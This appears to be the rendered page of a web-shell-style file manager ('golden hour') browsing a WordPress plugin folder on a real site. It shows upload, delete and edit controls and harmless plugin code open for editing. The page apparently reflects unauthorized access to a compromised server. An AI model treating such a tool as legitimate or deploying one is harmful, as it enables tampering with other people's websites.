golden hour
/home/godaofbq/besthyperbaric.com/wp-content/plugins/oxygen/plugin/util/wp
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
420 B
Del
OK
base.php
207 B
Del
OK
conditionals.php
340 B
Del
OK
get_authors.php
727 B
Del
OK
get_posts.php
1.49 KB
Del
OK
get_terms.php
1.61 KB
Del
OK
Edit: conditionals.php
<?php namespace Breakdance\Util\WP; use function Breakdance\Themeless\Rules\isSearch; /** * @return bool */ function is_home_when_home_is_the_posts_archive() { return is_home() && !is_front_page(); } /** * @return bool */ function isAnyArchive(){ return is_archive() || is_post_type_archive() || is_home() || isSearch(); }
Save